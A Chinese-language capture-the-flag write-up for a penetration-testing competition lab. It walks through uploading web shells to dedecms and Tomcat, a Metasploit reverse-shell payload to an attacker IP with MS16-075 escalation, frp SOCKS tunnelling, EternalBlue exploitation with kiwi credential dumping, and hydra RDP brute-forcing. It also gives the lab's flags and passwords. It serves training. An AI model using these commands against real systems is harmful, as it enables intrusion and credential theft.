# 网络安全渗透赛

[TOC]

## 一、靶场介绍

#### 1.场景介绍

没有网络安全就没有国家安全。推进网络强国建设，打造数字经济及网络信息安全产业集群，促进网络安全人才技能素质进一步提升，本次竞赛以小型企业网络环境为背景，以“数据安全”为主题，选手将在WEB安全漏洞综合利用方面和主机常见安全漏洞利用方面进行渗透博弈。

#### 2.场景拓扑

![image-20220617145013720380-1655869734762802.png](http://192.168.79.239/ct/upload/other/952d0bf7d537920df0c196e2211e611d.png)

#### 3.攻击路线

![image-20220617145050654695-1655869736096120.png](http://192.168.79.239/ct/upload/other/1d861c8f25ddf3f6d080bc99a2dddf49.png)

#### 4.知识点

文件包含漏洞

流量代理

永恒之蓝

hydra密码爆破

#### 5.CVE漏洞编号

CVE-2017-0146

#### 6.Attack&ck模型/Shield防御模型

T1595 - 主动扫描

T1110 - 暴力破解

T1090 - 连接代理

T1203 - 利用客户端漏洞获取执行权限

T1068 - 利用漏洞进行权限升级

#### 7.Engage攻防模型

EAC0014 - 软件操作

EAC0003 - 系统活动监控

EAC0004 - 网络分析

EAC0021 - 攻击向量迁移

## 二、靶场解题(Write up)

#### 阶段一：Web

##### 任务1：门户网站getshell(T1203 -  利用客户端漏洞获取执行权限)

已知目标`192.168.2.10`，登录`Win10`主机打开浏览器尝试访问：

![image-20220616173834087534-1655869737579532.png](http://192.168.79.239/ct/upload/other/34ae17afc1b19f1df4c3a4216c433739.png)

判断网站为dedecms，尝试访问后台`http://192.168.2.10/dede`：

![image-20220616174152583409-1655869738810599.png](http://192.168.79.239/ct/upload/other/29744b09aee59b9fa840fee123e8a187.png)

弱口令`admin/admin`登录成功：

![image-20220616174258408160-1655869740024430.png](http://192.168.79.239/ct/upload/other/4d66e7399c3f8f6c4061625d311bf54a.png)

点击`文件式管理器`>>`文件上传`：

![image-20220616174416492088-1655869741256412.png](http://192.168.79.239/ct/upload/other/40b59898283779b34081d9453f827599.png)

点击`选择文件`，选中桌面的`shell.php`文件，点击`打开(O)`：

![image-20220617155005909163-1655869742473514.png](http://192.168.79.239/ct/upload/other/0c396a5d3dd1f6e34f40fdd24a4e91a3.png)

点击`上传文件`

![image-20220616174416492088-1655869743686608.png](http://192.168.79.239/ct/upload/other/5f5e1142e522c9ae519bbf8f10b37675.png)

后门文件上传成功：

![image-20220616174416492088-1655869744916984.png](http://192.168.79.239/ct/upload/other/e17a302acfca6388416e2abbb5fa666f.png)

启动桌面的蚁剑：

![image-20220617155126489682-1655869746209930.png](http://192.168.79.239/ct/upload/other/9ae33c1ec3d7885b5334259590aeeea5.png)

右键空白处点击`添加数据`：

![image-20220617155210123874-1655869747499069.png](http://192.168.79.239/ct/upload/other/d4d84135f5d5a9193680de8a30e7d38e.png)

shell信息如下：

```
URL地址：http://192.168.2.10/uploads/shell.php

连接密码：cmd
```

![image-20220617161655492723-1655869748759268.png](http://192.168.79.239/ct/upload/other/d7614caf4cf0f25403477c7993491989.png)

点击`添加`后出现URL：

![image-20220617161716957585-1655869749942938.png](http://192.168.79.239/ct/upload/other/20864df89572f4fbdd87c03018c01251.png)

右键URL点击`虚拟终端`：

![image-20220617161932342628-1655869751127944.png](http://192.168.79.239/ct/upload/other/a0b4694f10deb6245d7b4aa0bf084e56.png)

终端中执行命令查看权限：

```
whoami
```

![image-20220617162008582211-1655869752346008.png](http://192.168.79.239/ct/upload/other/708a956df50abeb191fb3522d0d23752.png)

##### 任务2：烂土豆提权(T1068 -  利用漏洞进行权限升级)

登录`Kali`主机右键打开终端，执行命令：

```
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.88.88.8 lport=4444 -f exe > shell.exe
```

![image-20220617162252875548-1655869753543876.png](http://192.168.79.239/ct/upload/other/98eb49ee887ca36b86bf0f69070b7d94.png)

输入命令建立Web服务：

```
python3 -m http.server 8888
```

![image-20220617162334217056-1655869754755499.png](http://192.168.79.239/ct/upload/other/894b0706b97454e284396d34faca71df.png)

回到`Win10`主机，浏览器访问`http://10.88.88.8:8888`：

![image-20220617162431469279-1655869755954274.png](http://192.168.79.239/ct/upload/other/56981c5f413fcd185b5b4fc72560f750.png)

点击`shell.exe`进行下载：

![image-20220617162453838198-1655869757170836.png](http://192.168.79.239/ct/upload/other/f6a97a3a7499248f4f5cf256d08b7591.png)

点击`全部显示`>>`保留`：

![image-20220618111353870181-1655869758381428.png](http://192.168.79.239/ct/upload/other/7b63a1b7358728ea1eb037cc03bc0647.png)

![image-20220617162519442463-1655869759605888.png](http://192.168.79.239/ct/upload/other/5e4dcebd5c0eaf95958326cd0f15101d.png)

![image-20220617162528906003-1655869760813192.png](http://192.168.79.239/ct/upload/other/da2f4a756a843fd3a3dc8de8dab76738.png)

蚁剑中双击URL进入文件目录，将`shell.exe`拖拽到蚁剑目录中：

![image-20220617162623535976-1655869762027200.png](http://192.168.79.239/ct/upload/other/549bce235fa27d8ea90d110e4ec54527.png)

`Kali`主机中打开新的终端启动监听：

```
msfconsole

use exploit/multi/handler 

set payload windows/meterpreter/reverse_tcp

set lhost 10.88.88.8  

set lport 4444  

run
```

![image-20220617163922372386-1655869763224273.png](http://192.168.79.239/ct/upload/other/e056689e7da68c84d136e15baaad4360.png)

回到`Win10`主机的蚁剑中，在`shell.exe`所在目录下右键打开终端，执行命令：

```
shell.exe
```

![image-20220617163005728242-1655869764455758.png](http://192.168.79.239/ct/upload/other/01b20097a6c944f584bb6c96de614df1.png)

回到`Kali`主机的MSF中，获取到会话：

![image-20220617171300251251-1655869765699978.png](http://192.168.79.239/ct/upload/other/282400b1c65c51c5c2f837e83ea6b15f.png)

查看权限：

![image-20220617171323750573-1655869767272653.png](http://192.168.79.239/ct/upload/other/cde796ef33b0195d3d65c5abddd532ef.png)

输入`background`退出会话，获得`session id`：

![image-20220617171345538730-1655869768469244.png](http://192.168.79.239/ct/upload/other/207f3b4c449ef2d13b8ce3e63aa70f11.png)

我们可以利用`MS16-075`的payload进行提权：

	use exploit/windows/local/ms16_075_reflection_juicy
	
	set session 1
	
	run

![image-20220617171441233899-1655869770043419.png](http://192.168.79.239/ct/upload/other/408b148fc43d983dde2c5c9ef9a4036c.png)

查看权限：

![image-20220617171506717791-1655869771319655.png](http://192.168.79.239/ct/upload/other/928f4fcb57029c4bd73c6436d153bd1e.png)

进入交互界面：

```
shell

cd C:\Users\Administrator\Desktop

dir

type flag.txt
```

获取flag：

```
flag{9877-DD30-1335-C9C9-B4F9-0E8C-CC13-5FA4}
```

![image-20220622112535195681-1655869772626490.png](http://192.168.79.239/ct/upload/other/a879606a70b01c6f0297921eaa6fd99c.png)

##### 任务3：信息收集(T1595 - 主动扫描)

回到`Win10`主机，蚁剑终端中执行命令获取路由表：

![image-20220617171952877565-1655869773826249.png](http://192.168.79.239/ct/upload/other/34133da33c418998e04d1f662b66905e.png)

发现内网，上传扫描器，扫描器路径如下：

![image-20220617172024591913-1655869775037808.png](http://192.168.79.239/ct/upload/other/7165eb2ef4b729eac1d6c0aa3b2cf212.png)

上传至`C:/inetpub/wwwroot/uploads/`目录下：

![image-20220617172153587660-1655869776223413.png](http://192.168.79.239/ct/upload/other/1684d43e48832aed97824e98cb7757be.png)

在`C:/inetpub/wwwroot/uploads/`目录下右键打开终端，执行命令进行探测：

```
s.exe tcp 192.168.3.0/24 22,80,135,445,3389,8080 >> 1.txt
```

![image-20220617172353378696-1655869777471578.png](http://192.168.79.239/ct/upload/other/63f507be9150a49247cdbd61d74ad204.png)

扫描结果为`C:/inetpub/wwwroot/uploads/`目录下`1.txt`文件，刷新后可以看到：

![image-20220617172431163494-1655869779041326.png](http://192.168.79.239/ct/upload/other/d85f77ccdd156462123c2bd7690793c9.png)

查看扫描结果，末尾显示扫描时长和结果，可判断扫描是否结束：

![image-20220617172509031696-1655869780242608.png](http://192.168.79.239/ct/upload/other/cd9e4e49d71cd1b2386d132304ead7c3.png)

快捷键`Ctrl+F`搜索关键词`Open`，发现存活主机信息：

![image-20220617172754841319-1655869781429513.png](http://192.168.79.239/ct/upload/other/717b8b348dc58110d317e5787f609ab5.png)

##### 任务4：内网穿透(T1090 - 连接代理)

进入代理工具文件夹，路径如下：

![image-20220617172846162579-1655869782669172.png](http://192.168.79.239/ct/upload/other/19874c26f62bdeac4bdc7740a6613412.png)

导航栏输入cmd并回车打开命令行，输入命令启动代理服务端：

```
frps.exe -c frps.ini
```

![image-20220617173252515495-1655869783868320.png](http://192.168.79.239/ct/upload/other/881a7b78aad7ec800556f5954495fe92.png)

编辑`frpc.ini`文件为如下内容：

```
[common]
server_addr = 10.88.88.88
server_port = 7000

[ssh]
type = tcp
remote_port = 9998
plugin = socks5
```

保存修改后将`frpc.exe`和`frpc.ini`文件上传至蚁剑`C:/inetpub/wwwroot/uploads/`目录下，上传完成后右键打开终端，执行命令：

```
frpc.exe -c frpc.ini
```

隧道建立成功：

![image-20220617173351870511-1655869785066004.png](http://192.168.79.239/ct/upload/other/20f5cea1715655d0f672d04a71a85f29.png)

#### 阶段二：Server

##### 任务5：文件上传漏洞利用(T1203 -  利用客户端漏洞获取执行权限)

启动`proxifier`软件：

![image-20220617173554996313-1655869786269384.png](http://192.168.79.239/ct/upload/other/6ebd49d8992fc7ac5ba3f09be02ef256.png)

![image-20220617173611729920-1655869787465544.png](http://192.168.79.239/ct/upload/other/224855c3cb44b5ad93f99a91a928d297.png)

新增代理服务器：

![image-20220617173649225161-1655869788665825.png](http://192.168.79.239/ct/upload/other/6e78b530068c08206d02b3c4e44e54cb.png)

![image-20220617173712145279-1655869789874920.png](http://192.168.79.239/ct/upload/other/2d40d2a97fb0dc2f8dec9396e37cb0ba.png)

代理信息如下：

![image-20220617173758174370-1655869791076514.png](http://192.168.79.239/ct/upload/other/34f1d3d1c5ab54c1db766174658c7755.png)

![image-20220617173814747645-1655869792274397.png](http://192.168.79.239/ct/upload/other/1b93e6a235214127b21f54d056853b3f.png)

![image-20220617173824012855-1655869793470923.png](http://192.168.79.239/ct/upload/other/dc02932609895f1ce3e7d60fcfdf4aa0.png)

![image-20220617173832615675-1655869794654096.png](http://192.168.79.239/ct/upload/other/12c5de58d9751a0941c029974eedcf9b.png)

探测到`192.168.3.10`主机开放了8080端口，浏览器进行访问：

![image-20220617174311199450-1655869795855456.png](http://192.168.79.239/ct/upload/other/1d886e508f6e9520997c7871cf5bc6ff.png)

尝试登录后台：

![image-20220617174355361609-1655869797040850.png](http://192.168.79.239/ct/upload/other/71215cec1f89fe66b1435351804f9114.png)

使用弱口令`tomcat/tomcat`登录成功：

![image-20220617174424956215-1655869798237508.png](http://192.168.79.239/ct/upload/other/af89f0e2d2769d6618a3ecb3ab554657.png)

发现上传点：

![image-20220617174447026642-1655869799437248.png](http://192.168.79.239/ct/upload/other/15204aa8b2ef7b6bcaeb8e7d82f2c0c7.png)

进入`C:\Users\Administrator\Desktop\工具\shell\Behinder_v3.0_Beta_11.t00ls\server`目录，将`shell.jsp`文件进行压缩：

![image-20220617174514075843-1655869801275290.png](http://192.168.79.239/ct/upload/other/a8a59b9fa96622d1466df9050aad2232.png)

![image-20220617174603544304-1655869802486258.png](http://192.168.79.239/ct/upload/other/f6ed7499c2f887651e5f14920a039045.png)

将`shell.zip`重命名为`shell.war`：

![image-20220617174653128310-1655869803921867.png](http://192.168.79.239/ct/upload/other/7126c17b80a9cadfe23d273e06258e4d.png)

上传`shell.war`：

![image-20220617174843763087-1655869805103374.png](http://192.168.79.239/ct/upload/other/b0c4e24c827086c529e332a82398a3b1.png)

![image-20220617174852751667-1655869806317165.png](http://192.168.79.239/ct/upload/other/c255fb6ea2808edc5b87d1ef4e8a7284.png)

上传成功后打开冰蝎工具，工具路径如下，双击`Behinder.jar`：

![image-20220617175359735822-1655869807578528.png](http://192.168.79.239/ct/upload/other/9925439bd675137fc6e7ceb12ad55a45.png)

右键空白处点击新增，shell信息如下，配置完成后点击保存：

```
URL：http://192.168.3.10:8080/shell/shell.jsp

密码：rebeyond
```

![image-20220617175600099461-1655869808839442.png](http://192.168.79.239/ct/upload/other/5be610ce577f862d0b1ed7110ec9d01b.png)

双击URL进入交互界面，连接成功后点击`命令执行`：

![image-20220617175817957102-1655869810051802.png](http://192.168.79.239/ct/upload/other/9207fafac40ed18e6b7e86489dc0b813.png)

查看权限：

![image-20220617175839273995-1655869811325130.png](http://192.168.79.239/ct/upload/other/78379c11a2ccd5906436cf647ad92d8c.png)

查看当前目录，发现flag：

![image-20220622113451681609-1655869812538656.png](http://192.168.79.239/ct/upload/other/c75201910e85517fb3e90e0688b0251a.png)

```
flag{ECEA-FE1E-F62C-FDFB-450C-CF01-D9A1-6939}
```

#### 阶段三：User01

##### 任务6：永恒之蓝(T1068 -  利用漏洞进行权限升级)

登录`Kali`主机，打开终端设置代理：

```
vim /etc/proxychains4.conf
```

设置如下：

![image-20220618093809943627-1655869813796049.png](http://192.168.79.239/ct/upload/other/fab300839e166b986d39710881d4f278.png)

保存后启动MSF：

```
proxychains4 msfconsole
```

检查到`192.168.3.20`主机开放445端口，尝试利用永恒之蓝漏洞：

```
use auxiliary/scanner/smb/smb_ms17_010

set rhosts 192.168.3.20

run
```

![image-20220618094104856411-1655869815094034.png](http://192.168.79.239/ct/upload/other/f881aa71fcb33a0348eaae8f1d0e71b7.png)

目标疑似存在该漏洞，尝试攻击：

```
use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/bind_tcp

set rhost 192.168.3.20

run
```

成功获取会话：

![image-20220618094336413991-1655869816476112.png](http://192.168.79.239/ct/upload/other/2a6304fe88a0855c120981016bd89bb7.png)

查看权限：

![image-20220618094407379088-1655869817746108.png](http://192.168.79.239/ct/upload/other/5bf950c53deea4730ec44ab250fa2bc0.png)

加载kiwi模块。

```
load kiwi
```

![image-20220618100347636543-1655869819009004.png](http://192.168.79.239/ct/upload/other/0bb28b50123ba4bc83139136f1d379c9.png)

获取主机账户密码。

```
creds_kerberos
```

![image-20220618100442595110-1655869820329532.png](http://192.168.79.239/ct/upload/other/1a3cc3103384c5b3b6353073e5a9b803.png)

回到`Win10`主机，启动远程桌面：

![image-20220618100520529717-1655869821589218.png](http://192.168.79.239/ct/upload/other/b68f49cd39fb09cbfaaccdd86df0eadd.png)

远程主机信息：

```
远程地址：192.168.3.20

登录信息：SCENE\Administrator

登录密码：123456
```

远程登录成功后在桌面发现flag：

![image-20220622113723589508-1655869822833715.png](http://192.168.79.239/ct/upload/other/6e0b2278fec62404fe0dbee87e747f68.png)

```
flag{CEEC-DD6F-547D-B348-4D46-76F1-F30A-CB65}
```

#### 阶段四：User02

##### 任务7：hydra爆破rdp(T1110 - 暴力破解)

回到`Kali`主机，因`192.168.3.30`主机开放3389端口，打开新的终端，输入命令爆破`192.168.3.30`主机rdp密码：

```
proxychains4 hydra -l Administrator -P /root/Desktop/Tools/fuzzDicts/passwordDict/top500.txt rdp://192.168.3.30 -V
```

![image-20220618103525204495-1655869824141137.png](http://192.168.79.239/ct/upload/other/cc20cba41d8fd1dbe96ad76ac30f5500.png)

回到`Win10`主机，尝试远程登录：

```
远程地址：192.168.3.30

登录信息：Administrator

登录密码：123456
```

远程登录成功后在桌面发现flag：

![image-20220622113926871462-1655869825418131.png](http://192.168.79.239/ct/upload/other/8c51845512d408112edac3ac67ffaa86.png)

```
flag{02B1-8B93-D7F6-7385-C2E5-3269-C881-1F62}
```